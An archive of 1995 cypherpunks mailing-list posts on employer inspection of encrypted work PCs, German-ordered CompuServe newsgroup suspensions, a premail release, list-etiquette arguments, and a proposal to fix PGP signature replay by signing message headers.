Message-ID: <9512272350.AA27768@tssun5.>
MIME-Version: 1.0
Content-Type: text/plain



> From owner-cypherpunks@toad.com Wed Dec 27 17:48 CST 1995
> Date: Wed, 27 Dec 1995 16:51:41 -0500
> Subject: Employer Probing Precedents?
> To: cypherpunks@toad.com
> From: "Jason D. Livingood/WSC"@hks.net
> X-Server-Version: Cactus-Serv 1.5
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> To Whom It May Concern:
> 
> I was curious as to where I might find some electronic freedom legal 
> precedents.  If, for example, an employer was planning to probe file systems on 
> PCs in the off-hours and employees began encrypting their hard drives, what 
> legal precedents would support the employees or would support the employer in 
> blocking the encryption?

Try www.eff.org.

I have a partition on my HD that is routinely encrypted.  When asked about it,
my response was that I was acting to protect company confidential material
and company assets.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ecarp@tssun5.dsccc.com
Date: Fri, 29 Dec 1995 15:50:17 +0800
To: cypherpunks@toad.com
Subject: Re: Employer Probing Precedents?
Message-ID: <9512272351.AA27795@tssun5.>
MIME-Version: 1.0
Content-Type: text/plain



> From owner-cypherpunks@toad.com Wed Dec 27 17:48 CST 1995
> Date: Wed, 27 Dec 1995 16:51:41 -0500
> Subject: Employer Probing Precedents?
> To: cypherpunks@toad.com
> From: "Jason D. Livingood/WSC"@hks.net
> X-Server-Version: Cactus-Serv 1.5
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> To Whom It May Concern:
> 
> I was curious as to where I might find some electronic freedom legal 
> precedents.  If, for example, an employer was planning to probe file systems on 
> PCs in the off-hours and employees began encrypting their hard drives, what 
> legal precedents would support the employees or would support the employer in 
> blocking the encryption?

Try www.eff.org.

I have a partition on my HD that is routinely encrypted.  When asked about it,
my response was that I was acting to protect company confidential material
and company assets.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@kiwi.cs.berkeley.edu>
Date: Thu, 28 Dec 1995 21:02:46 +0800
To: cypherpunks@toad.com
Subject: Re: Only accepting e-mail from known parties
In-Reply-To: <qJoRgD2w165w@bwalk.dm.com>
Message-ID: <199512280151.RAA25092@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Dimitri Vulis wrote:
> I suggest to the kind folks working on PGP 3 that there should be a
> standard protocol to include within the signed portion the information
> on when and for whom this text is written: i.e. the list of e-mail
> recipients and/or Usenet newsgroups, which could be easily compared
> with the RFC 822/1036 headers of an e-mail/Usenet article. Perhaps
> there could be a new option for PGP to look _outside_ the signed block
> and match the headers with what's inside the block. E.g., suppose the
> signature block says: this text was written by alice@zog.org, posted
> to alt.sex and alt.sex.banal and e-mailed to bob@masons.com. Suppose
> PGP is asked to check the signature in a file that purports to be a
> e-mail or a Usenet article and has some headers before the signed
> portion. If there is a list of To: recipients, and it includes someone
> other than the recipients listed within the signed block; or if there
> is a Newsgroups: header, and it includes newsgroups not listed within
> the signed portion; then the input is bogus. For compatibility with
> the existing software, if the signed block doesn't include this info,
> then this checking should't be done, of course.

In fact, the security multiparts standard (RFC 1848) includes a
provision for signing the headers as well as the body of a message.
The security multiparts can be used with PGP, and there is even an
Internet Draft for it (draft-elkins-pem-pgp-02.txt), but there is not
yet consensus for adopting this as a standard on the pgp-mime mailing
list. Perhaps your example can be used to argue one the advantages of
the security multiparts approach.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Farber <farber@central.cis.upenn.edu>
Date: Thu, 28 Dec 1995 21:29:50 +0800
To: John Pettitt <cypherpunks@toad.com
Subject: German government orders censorship of CompuServe -- a   sign of things to come djf
Message-ID: <2.2.32.19951227235302.006bfe14@linc.cis.upenn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Posted-Date: Wed, 27 Dec 1995 17:47:17 -0500
X-Sender: farber@linc.cis.upenn.edu
Date: Wed, 27 Dec 1995 17:47:17 -0500
From: Dave Farber <farber@central.cis.upenn.edu>
Subject: IP: German government orders censorship of CompuServe -- a
  sign of things to come djf
To: 


FOR IMMEDIATE RELEASE


CONTACT:  William Giles                 Russ Robinson
CompuServe Incorporated              CompuServe Incorporated
           614/ 538-4388                        614/ 538-4274



COMPUSERVE(R) SUSPENDS ACCESS TO SPECIFIC INTERNET NEWSGROUPS

COLUMBUS, Ohio, Dec. 28, 1995 -- During the past week, CompuServe Incorporated
temporarily suspended access to more than 200 Internet newsgroups in response to
a direct mandate from the prosecutor s office in Germany.  Each of the
newsgroups that was suspended was specifically identified to CompuServe by the
German authorities as illegal under German criminal law.  CompuServe did not
select any groups or determine the nature of the newsgroups that have been
impacted by this action.  
        German government officials, as part of an investigation of illegal
material on the Internet, ordered CompuServe to do what was necessary with
respect to specified newsgroups in order to comply with German law.  German
authorities are investigating newsgroups and other Internet content that may
contain child pornography, other pornographic material illegal for adults, as
well as content that although not illegal for adults is of such an explicit
nature that it is illegal for minors.  
        While access has been suspended, CompuServe continues to work with
German authorities to resolve this matter.  CompuServe cannot alter the content
on the Internet in any way and has only suspended access to the disputed
newsgroups through CIS.  The issues being investigated in Germany, like those
being addressed across the industry, need to remain focused on the individuals
and groups placing content on the Internet.  CompuServe, as an access provider,
is not responsible for the origination or nature of content on the Internet over
which it has no creative or editorial control.

        The global market is vital to CompuServe.  We currently have 500,000
members in Western Europe and anticipate doubling that number in the next year.
As the leading global service, CompuServe must comply with the laws of the many
countries in which we operate.  
However, laws in different countries are often in conflict, and this creates new
challenges unique to the emerging online industry.  CompuServe is investigating
ways in which we can restrict user access to selected newsgroups by geographical
location.  



>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Thu, 28 Dec 1995 21:29:25 +0800
To: cypherpunks@toad.com
Subject: URL for cypherpunks
Message-ID: <ad07a8b7010210043d01@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


I am putting up some solutions to the Garage Door problem that was
discussed here perhaps a year ago. I would like to refer to the cypherpunks
by URL. Are there currently any appropriate URLs ?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 28 Dec 1995 23:06:23 +0800
To: futplex@pseudonym.com
Subject: Re: Telcom bill report
Message-ID: <01HZBAWIUN7C8Y55DD@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"futplex@pseudonym.com" 21-DEC-1995 18:57:06.16

>> 	Here's the additional info from Reuters. As usual, Clinton is being a
> coward. 

How do you figure ?

>    Vice President Gore says President Clinton will sign the bill. Before
>    the agreement, the president had been threatening for months to veto
>    the bill if Republicans in Congress did not retreat on a long list of
                 ~~~~~~~~~~~
>    issues. They retreated.
             ~~~~~~~~~~~~~~

Clinton won on this. The Administration does not appear to have altered its
position on this substantially.
----------
	I am calling Clinton a coward for giving in to the Christian Coalition
and not vetoing this bill due to the censorship portion. He evidently decided
that following his oath of office and upholding the First Amendment wasn't
worth the "porn supporter" criticism Ralph Reed and his lot would direct his
way.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Thu, 28 Dec 1995 22:18:23 +0800
To: cypherpunks@toad.com
Subject: Announcing a new alpha release of premail
Message-ID: <199512280524.VAA09252@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


   This is to announce that premail version 0.42 is now available. It
is a full alpha version of the new premail, containing all the
features and functions planned for the production release.

   Features include:

* Support for all cypherpunk remailers.

* Support for Mixmaster remailers.

* Encrypted and signed email, including both preparation and decoding.

* Support for the emerging PGP/MIME standard.

* Support for MOSS through TIS/MOSS 7.1.

* Creation and management of alpha.c2.org style nyms.

* More secure handling of sensitive "secrets".

* Much improved automatic selection of remailer chains.

* Clean handling of "cc:" field and other such interactions.

* Numerous other features.

   For more information about premail, see the premail Web page at:

      http://www.c2.org/~raph/premail.html

   If you are in the US or Canada, you can download premail now, from
the premail Distribution Authorization Form:

      http://kiwi.cs.berkeley.edu/premail-form.html

   Please forward bug reports, comments, and suggestions to me, so
that the beta release can be as solid as possible.

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 28 Dec 1995 16:50:35 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE
Message-ID: <199512272040.VAA17079@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



[ More non-crypto garbage deleted ]

> > God, you are annoying Fred, ER, I meant, "Alice".

> My dearest Perry.

> I am not Fred.  I am not he.  He is not me. Got it??  We aren't even in
> the same category or the same country.  Fred's an American, and I am not.

But you do have much in common.  Perry did not say that you are Fred,
but instead implied he mixed the two of you up (quite understandable).

> Scary, isn't it??  A non-American ...

What's scary is a non-American foaming at the mouth about American
politics when I'm sure his own country is far from perfect.


P.S.  This post is in the public domain.

          G. E. T. A. F. U. C. K. I. N. G. C. L. U. E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Thu, 28 Dec 1995 21:36:28 +0800
To: cypherpunks@toad.com
Subject: Only accepting e-mail from known parties
Message-ID: <199512280241.VAA19432@pipe10.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


[Below is the original I failed to post to the group as a whole. Sorry
about the temporal confusion that produced.] 
 
On Dec 25, 1995 14:53:19, 'Adam Shostack <adam@lighthouse.homeport.org>'
wrote: 
 
 
>	The basic problem is that (personal) spam is a social, not a 
>technical problem.  If someone wants to annoy you via the internet, 
>they can do so.  You can raise the cost of their annoying you, but you 
>need to be careful not to make it difficult to talk to you. 
> 
 
I agree in many ways. On a personal level, I am far more interested in the
*social* are of this form of privacy. It is more a problem of the
data-hermit than privacy. And in a society increasingly generating
narcissistists, I see the problem getting worse. 
 
Negroponte of the MIT Media Lab can sing the praises of the personal
e-newspaper with personal filters to cut out everything uninteresting while
culling the world new feeds for desired information. 
 
I see this feeding into the narcissitism problem. E.G. 
 
Imagine two people who "feel" that members of the other gender are "only
interested in one thing." 
 
Each wakes up in the morning and looks at their personal e-paper. 
 
She reads nothing of particularly nasty rapes, serial rapists at large,
rapists who have been convicted, and rapists who an uncaring pro-male
system has let out to rape again (i.e. been found not guilty). 
 
He reads nothing of particularly nasty robberies of men by women, serial
robberies by prostitutes, female robbers who have been convicted, and
robbers who an uncaring pro-female system has let out to rob again. 
 
Both believe that their custom filtered feeds are the *real* events going
on in the world and are far more accurate than any non-customized news
feed. 
 
I hope nobody takes this as a generic attack on the privacy issues that the
list is devoted to. I am a great supporter of privacy and pro-privacy tek.
But I see myself as a realist on privacy issues, not as a privacy-utopian
or a privacy-dystopian. 
 
We live in a post-Faustian world. 
 
It is divided into two groups of people. First are those who understand the
post-Faustian character and devote themselves to getting used to it and
even having fun with the new opportunities while understanding that the new
world also generates new problems (like furthering data-narcicism). Second
are those classic-reactionary forces (from all parts of the political
spectrum) who whine about how the post-Faustian world is personally unfair
to them and how everybody in the world has a personal obligation to them to
move the world back to its pre-Faustian origins. 
 
--tallpaul 
 
PS to Tim May: I understand your posts on material that is off-topic. I
usually agree with your posts. But I see the issues I discussed above as
far more on topic (even if highly mediated) than, say, the ongoing
discourse on the differences between an Army Captain and a Navy Captain.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Thu, 28 Dec 1995 22:43:28 +0800
To: vznuri@netcom.com
Subject: Re: another anonymous poster helping to destroy our rights
Message-ID: <9512280551.AA13342@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Vladimir Z. Nuri" 

you can't have it both ways. either anyone is free to decide what a 
cypherpunk is, and no one has the right to argue with it. or, cypherpunks
are something in particular, and someone has the authority to  determine
that.
............................................

So are you saying that "SHTBD!!!!"?  :>)

As you note, it is an informal system which operates on the list.  As you also 
note, an  "intelligent and mischievous adversary" can effectively create 
problems.  But you failed to note that intelligent and technically savvy 
members will find effective ways to deal with it.

That is what is important about an 'anarchic' list like this - that the 
challenge of maintaining rational discourse is met by the application of active 
intelligence, rather than all the rigmarole you mentioned.  And this is what 
makes it interesting, I think.  Any person's ideas or concepts or contributions 
can be tested or challenged by the more knowledgeable on the list, if they are 
so moved (or not, if they are not so moved).

The organizing subject around which discussions revolve is crypto, within the 
social context.  Because of this, the relationship to the main subject is 
difficult to maintain.  (And isn't this list like a microcosm, at times, of the 
larger social picture?) 

It is the unexpurgated exchanges of thought & expression, which regulate the 
list.
It reminds me of a book about life:   You Learn, or You Die. <g>

  ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Fri, 29 Dec 1995 16:14:52 +0800
Subject: A weakness in PGP signatures, and a suggested solution (long)
Message-ID: <oTTsgD7w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I've been engaged in a lively debate with a few members of the cypherpunks
mailing list about forgeries that are hard to repudiate even if PGP signatures
are used. One of the participants suggested that I post a summary to
alt.privacy.pgp and sci.crypt, which is just what I'm doing.

(My apologies to the mail.cypherpunks readers who already saw much of
this once.)

I'll illustrate the problem with several scenarios of forgeries.
(It's funny that earlier today I was showing a friend how easy it is to
post forgeries. She seemed suitably impressed. :)

Scenario 1:

Bob once sent Carol an e-mail that looked like this:

-----------------------------------------------------------------------
From: Bob@boxb
To: Carol@boxc
Date: 25 Dec 1965
Subject: Carol, we're history
Message-ID: <111@boxb>

----BEGIN PGP SIGNED MESSAGE----

I no longer wish to go out with you. Merry Christmas!

----BEGIN PGP SIGNATURE----
Version 2.6.2

12341234...

----END PGP SIGNATURE----

-----------------------------------------------------------------------

Carol can forge an e-mail to Alice that looks like this:

-----------------------------------------------------------------------
From: Bob@boxb
To: Alice@boxa
Date: 25 Dec 1995
Subject: Alice, we're history
Message-ID: <222@bobb>

----BEGIN PGP SIGNED MESSAGE----

I no longer wish to go out with you. Merry Christmas!

----BEGIN PGP SIGNATURE----
Version 2.6.2

12341234...

----END PGP SIGNATURE----

-----------------------------------------------------------------------

We assume that it's easy for Carol to forge the RFC 822 headers to make it look
like the e-mail came from Bob. That's why many of us use digital signatures.

The signed portion of Bob's original e-mail did not state that the message is
addressed to Carol (e.g., "Dear Carol"). Alice will probably verify that the
signature matches Bob's private key and assume that the e-mail is authentic and
has been sent to her by Bob. To repudiate the e-mail, Bob might have to point
out that the "Received:" headers differ from his usual e-mails, without relying
on PGP. In fact, the presense of his verifiable signature would create more of
a presumption of authenticity of Alice's part.

Scenario 2:

Bob sends the same e-mail as above to Carol. David, a rogue sysadmin, gets
a copy of the e-mail, forges the same e-mail as above to Alice.

Scenario 3:

Bob sends a signed e-mail to Alice. Alice sees it in her newsfeed, forges a
Usenet article, makes it look like it came from Bob, and includes the body of
Bob's e-mail as the body of the Usenet forgery. Usenet forgeries are easy.

Again, if the signed text happens to be suitable, then Bob will have difficulty
repudiating the forgery. He won't not be able to use the PGP signature, which
will in fact verify. Hopefully, he'll be able to point out that the RFC 1036
Path: header is different from his usual header (which may not be the case).
Many Usenet readers would be unconvinced and Bob's reputation would be damaged.

Scenario 4:

Bob posts a signed Usenet article to alt.sex. Alice forges a usenet article in
Bob's name to misc.kids, recycilng the signed body, which would probably be
considered inappropriate for misc.kids. Same result as #3.

Scenario 5:

Bob posts a signed Usenet article to some innocuous newsgroup. Alice reposts
the same body in a forgery in Bob's name. The forgery can be cross-posted to
numerous "inappropriate" newsgroups ("velveeta"), or multi-posted ("spam").
Certain rogue self-apponited net.cops forge cancels for all copies of Bob's
article, including the original. (They are a bigger menace than the forgers :)

(As several people know, I have been a victim of some of the above-described
kinds of forgeries.)

I think the underlying problem is that the way PGP signatures are used by most
people, they validate a text, but allow it to be quoted out of context in an
e-mail or Usenet forgery.

I suggest to the kind folks working on PGP 3 that there should be a standard
protocol to include within the signed portion the information on when and for
whom this text is written: i.e. the list of e-mail recipients and/or Usenet
newsgroups, which could be easily compared with the RFC 822/1036 headers of an
e-mail/Usenet article. Perhaps there could be a new option for PGP to look
_outside_ the signed block and match the headers with what's inside the block.
For example, suppose the signature block says: this text was written by
alice@zog.org, posted to alt.sex and alt.sex.banal and e-mailed to
bob@masons.com. Suppose PGP is asked to check the signature in a file that
purports to be a e-mail or a Usenet article and has some headers before the
signed portion. If there is a list of To: recipients, and it includes someone
other than the recipients listed within the signed block; or if there is a
Newsgroups: header, and it includes newsgroups not listed within the signed
portion; then the input is bogus. For compatibility with the existing software,
if the signed block doesn't include this info, then this checking should't be
done, of course.

After I posted the above suggestion to cypherpunks, one very respected member
of that list informed me that "the security multiparts standard (RFC 1848)
includes a provision for signing the headers as well as the body of a message.
The security multiparts can be used with PGP, and there is even an Internet
Draft for it (draft-elkins-pem-pgp-02.txt), but there is not yet consensus for
adopting this as a standard on the pgp-mime mailing list."

I hope my examples will convince some that present practice of signing pieces
of text which can be quoted out of context in a forgery is just not enough.

We need to have an easy way to sign the headers without resorting to mine.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 3 Jan 1996 21:09:58 +0800
To: Cypherpunks Lite <cp-lite@comsec.com>
Subject: A weakness in PGP signatures, and a suggested solution (long)
Message-ID: <199601030407.UAA12551@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


I've been engaged in a lively debate with a few members of the cypherpunks
mailing list about forgeries that are hard to repudiate even if PGP signatures
are used. One of the participants suggested that I post a summary to
alt.privacy.pgp and sci.crypt, which is just what I'm doing.

(My apologies to the mail.cypherpunks readers who already saw much of
this once.)

I'll illustrate the problem with several scenarios of forgeries.
(It's funny that earlier today I was showing a friend how easy it is to
post forgeries. She seemed suitably impressed. :)

Scenario 1:

Bob once sent Carol an e-mail that looked like this:

-----------------------------------------------------------------------
From: Bob@boxb
To: Carol@boxc
Date: 25 Dec 1965
Subject: Carol, we're history
Message-ID: <111@boxb>

----BEGIN PGP SIGNED MESSAGE----

I no longer wish to go out with you. Merry Christmas!

----BEGIN PGP SIGNATURE----
Version 2.6.2

12341234...

----END PGP SIGNATURE----

-----------------------------------------------------------------------

Carol can forge an e-mail to Alice that looks like this:

-----------------------------------------------------------------------
From: Bob@boxb
To: Alice@boxa
Date: 25 Dec 1995
Subject: Alice, we're history
Message-ID: <222@bobb>

----BEGIN PGP SIGNED MESSAGE----

I no longer wish to go out with you. Merry Christmas!

----BEGIN PGP SIGNATURE----
Version 2.6.2

12341234...

----END PGP SIGNATURE----

-----------------------------------------------------------------------

We assume that it's easy for Carol to forge the RFC 822 headers to make it look
like the e-mail came from Bob. That's why many of us use digital signatures.

The signed portion of Bob's original e-mail did not state that the message is
addressed to Carol (e.g., "Dear Carol"). Alice will probably verify that the
signature matches Bob's private key and assume that the e-mail is authentic and
has been sent to her by Bob. To repudiate the e-mail, Bob might have to point
out that the "Received:" headers differ from his usual e-mails, without relying
on PGP. In fact, the presense of his verifiable signature would create more of
a presumption of authenticity of Alice's part.

Scenario 2:

Bob sends the same e-mail as above to Carol. David, a rogue sysadmin, gets
a copy of the e-mail, forges the same e-mail as above to Alice.

Scenario 3:

Bob sends a signed e-mail to Alice. Alice sees it in her newsfeed, forges a
Usenet article, makes it look like it came from Bob, and includes the body of
Bob's e-mail as the body of the Usenet forgery. Usenet forgeries are easy.

Again, if the signed text happens to be suitable, then Bob will have difficulty
repudiating the forgery. He won't not be able to use the PGP signature, which
will in fact verify. Hopefully, he'll be able to point out that the RFC 1036
Path: header is different from his usual header (which may not be the case).
Many Usenet readers would be unconvinced and Bob's reputation would be damaged.

Scenario 4:

Bob posts a signed Usenet article to alt.sex. Alice forges a usenet article in
Bob's name to misc.kids, recycilng the signed body, which would probably be
considered inappropriate for misc.kids. Same result as #3.

Scenario 5:

Bob posts a signed Usenet article to some innocuous newsgroup. Alice reposts
the same body in a forgery in Bob's name. The forgery can be cross-posted to
numerous "inappropriate" newsgroups ("velveeta"), or multi-posted ("spam").
Certain rogue self-apponited net.cops forge cancels for all copies of Bob's
article, including the original. (They are a bigger menace than the forgers :)

(As several people know, I have been a victim of some of the above-described
kinds of forgeries.)

I think the underlying problem is that the way PGP signatures are used by most
people, they validate a text, but allow it to be quoted out of context in an
e-mail or Usenet forgery.

I suggest to the kind folks working on PGP 3 that there should be a standard
protocol to include within the signed portion the information on when and for
whom this text is written: i.e. the list of e-mail recipients and/or Usenet
newsgroups, which could be easily compared with the RFC 822/1036 headers of an
e-mail/Usenet article. Perhaps there could be a new option for PGP to look
_outside_ the signed block and match the headers with what's inside the block.
For example, suppose the signature block says: this text was written by
alice@zog.org, posted to alt.sex and alt.sex.banal and e-mailed to
bob@masons.com. Suppose PGP is asked to check the signature in a file that
purports to be a e-mail or a Usenet article and has some headers before the
signed portion. If there is a list of To: recipients, and it includes someone
other than the recipients listed within the signed block; or if there is a
Newsgroups: header, and it includes newsgroups not listed within the signed
portion; then the input is bogus. For compatibility with the existing software,
if the signed block doesn't include this info, then this checking should't be
done, of course.

After I posted the above suggestion to cypherpunks, one very respected member
of that list informed me that "the security multiparts standard (RFC 1848)
includes a provision for signing the headers as well as the body of a message.
The security multiparts can be used with PGP, and there is even an Internet
Draft for it (draft-elkins-pem-pgp-02.txt), but there is not yet consensus for
adopting this as a standard on the pgp-mime mailing list."

I hope my examples will convince some that present practice of signing pieces
of text which can be quoted out of context in a forgery is just not enough.

We need to have an easy way to sign the headers without resorting to mine.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 28 Dec 1995 22:26:48 +0800
To: cypherpunks@toad.com
Subject: Re: Employer Probing Precedents?
Message-ID: <ad075aa403021004f767@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:51 PM 12/27/95, "Jason D. Livingood/WSC"@hks.net wrote:
>To Whom It May Concern:
>
>I was curious as to where I might find some electronic freedom legal
>precedents.  If, for example, an employer was planning to probe file
>systems on
>PCs in the off-hours and employees began encrypting their hard drives, what
>legal precedents would support the employees or would support the employer in
>blocking the encryption?

Think of it another way.

I have a PC which is for the use of my employee. It is my computer. I am
his employer. He runs the programs I authorize him to, or at least I trust
him to run programs needed to do his job and not use my computer to run a
numbers racket or to manage his drug business. Thus, I reserve the right to
inspect my own computer as I wish. He is free to accept this condition, or
of course to leave.

There can be no valid or reasonable law which says that my computer, which
he uses, is no longer accessible to me because his "electronic privacy"
takes precedence over my property rights. Nor any valid or reasonable law
which says I cannot restrict what encryption programs he uses on *my*
computer.

(There are several on this list who disparage what they call the
"libertarian emphasis on property rights over human rights," or somesuch.
Fact is, property rights are central to all human rights. In the case of my
employee using my computer, the concept of "his" human rights makes little
sense: there is no "democracy" in corporations, as we normally think of
democracy. Nor is there any "right of free speech," and so on. You may not
like this, but this is the way it is, and should be.)

I can't cite case law about "employee privacy," not being a lawyer, but I
know that companies routinely restrict the uses to which their computers
are put (video games, gambling, accessing porn are some obvious examples)
and employees have very little to say about it. Furthermore, companies may
need to look at hard drives to see if pirated software which could expose
them to millions of dollars in damages (and raids by the SPA cops).

I may not _like_ the fact that my employer (if I had one) is rooting
through my hard disk, but it is, after all, his computer, and his liability
if I am using his computers for illegal or unprofessional purposes.

The courts have granted certain types of employee privacy, about things
like the contents of purses and briefcases (though both of these examples
can and do face inspections, as I faced when I worked for Intel). And
monitoring of phone conversations now has a set of rules associated with
it.

But employers can always restrict what kinds of programs can be run on
their computers.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Albatross <alby@empire.org>
Date: Thu, 28 Dec 1995 23:25:21 +0800
To: nobody@mail.uu.net
Subject: Re: BoS: Re: Misconfigured Web Servers
In-Reply-To: <Pine.SUN.3.91.951227164940.5515F-100000@thetics.europa.com>
Message-ID: <199512280308.WAA09007@empire.org>
MIME-Version: 1.0
Content-Type: text


> 
> On Wed, 27 Dec 1995, David Klur wrote:
> 
> >      
> >      Re: the "trick" below... an even more effective search is the 
> >      following...
> >      
> Is it just me, or is everyone getting a dozen of these?


	Yup!  I'm also receiving a ton..
-Alby




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Thu, 28 Dec 1995 22:55:17 +0800
To: cypherpunks@toad.com
Subject: Re: Only accepting e-mail from known parties
Message-ID: <199512280309.WAA23655@pipe10.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


[I mistakenly failed to post the original message to which A.J. Stuckey
responded to the entire group. I have corrected this error. However, A.J.
Stuckey quoted enough of the original to have his questions comprehensible
so I'll reply to them here without waiting for the original to be sent to
the list.] 
 
On Dec 27, 1995 15:50:55, '"Anthony J. Stuckey"
<stuckey@mrcnext.cso.uiuc.edu>' wrote: 
 
 
>In uiuc.mlist.cypherpunks you write: 
>>We live in a post-Faustian world.  
>>  
>>It is divided into two groups of people. First are those who understand
the 
>>post-Faustian character and devote themselves to getting used to it and 
>>even having fun with the new opportunities while understanding that the
new 
>>world also generates new problems (like furthering data-narcicism).
Second 
>>are those classic-reactionary forces (from all parts of the political 
>>spectrum) who whine about how the post-Faustian world is personally
unfair 
>>to them and how everybody in the world has a personal obligation to them
to 
>>move the world back to its pre-Faustian origins.  
> 
>	Just what exactly defines a "post-Faustian" world?  That we're aware 
>people will sell their souls for power? 
>--  
 
I wasn't a matter of people selling their souls for power or that we're
aware of it. My original reference was to one view on our society (not
necessarily reflected on the list) that we must "avoid the Faustian
bargain." 
 
Gee, I hated to inform them that the Faustian bargain had already been made
and made anywhere from hundreds to tens of thousands of years ago. In this
sense, we live in a post-Faustian [bargain] world. 
 
The bargain, so to speak, was not about knowledge or power or other such
things. Those were involved only in the negotiating stages of the contract.
The *real* bargain occured when Faust stated: 
 
     "And if I should ever say, 
     "'Oh moment stay!' 
     "Thou art so fair!' 
     "I *deserve* to perish 
     "Then and there. 
          _Faust_, Part I, Goethe 
 
We are all caught in a process that can not be even stopped let alone
turned back without damnation. We need not like this; we need not support
it; we can even pull the covers over our heads and refuse to recognize it.
But the bargain and process exists nonetheless. 
 
There are Group One people, like (most) cypherpunks and others who
understand the bargain has been made, who accept the world, and who may
even have fun participating in a continuing and ever changing process. E.G.
the microprocessor was invented. This created the possibility of things
like PGP that in turn created the first opportunity in the history of the
world for the average man and woman to have privacy as (pretty) good as any
government *if they were willing to provide themselves that privacy.* The
same invention also meant the greatest invasion of privacy through
computerized lists at credit card companies, etc. 
 
Now personally I like PGP and do not personally like credit company's data
bases. But both exist in the world and I recognize the inevitability of
both. 
 
The you have Group Two people who whine about how the development of the
microprocessor created a world they don't like, that is unfair to them,
that is based on the Faustian bargain, etc. etc. 
 
To them, the world says (if it bothers to say anything at all) "Tough!" Now
am I inclined to give up either PGP or my Pentium because these necessarily
exist in the same world with the credit companies they do not like. 
 
To use another example: we have the internet and we have a _de jure_
freedom of speech. 
 
Group One people like the net, even if it means that a few people are going
to send "kiddie porn" over the wires instead of looking at the old "kiddie
underwear" ads in the _Sears_ catalog. 
 
Group Two people are fearful of the net and hate it, frequently attempting
to rationalize their fears by reference to "kiddie porn," "drugs,"
"terrorists," etc.   They want their fears to dominate both the net and
freedom of speech on a global level. "If it doesn't play in Peoria then it
shouldn't play in Denmark," etc. 
 
Group One people say in essence that "kiddie porn" is a small price to pay
for the net and expanded freedom of speech; Group Two people say in essence
that the net is too high a price for "kiddie porn" and let us also reduce
freedom of speech while we're at it. 
 
As I wrote, it is a post-Fastuain world and none of us can go home to the
pre-Faustian world ever again. 
 
==tallpaul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <doug@Eng.Auburn.EDU>
Date: Thu, 28 Dec 1995 22:41:41 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: another anonymous poster helping to destroy our rights
In-Reply-To: <199512272022.MAA25782@netcom17.netcom.com>
Message-ID: <Pine.SUN.3.91.951228001746.371A-100000@strangelove.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Dec 1995, Vladimir Z. Nuri wrote:

> 
> so far the "authorities" are those who have been on a the list a long time.
> (it is still an informal system however).  this is a reasonable system. 
> but I object to the way that people such 
> as PM argue in one message that "there is no such thing as the cypherpunks"
> but then endlessly determine themselves what is appropriate for the list.
> doesn't anyone see the inconsistency-at-best-and-hypocrisy-at-worst of this?

No, what's appropriate is what's in the charter. Stuff related to 
cryptography and its offshoots. Conspiracy du-jour is totally unrelated,
and Perry is right, it doesn't belong. I don't see why that's so hard
to understand. Perry isn't acting as a list owner, but the subconscious
reminder to "stick closer to the charter". He's a bit billious, but it
helps to cut out the drivel, so I don't mind so much.
 They (I) object when something is labelled as cypherpunk because many of
the people on this list have completely opposite views on different
topics. There is no gestault.  A mailing list does not make a common
personality.


____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
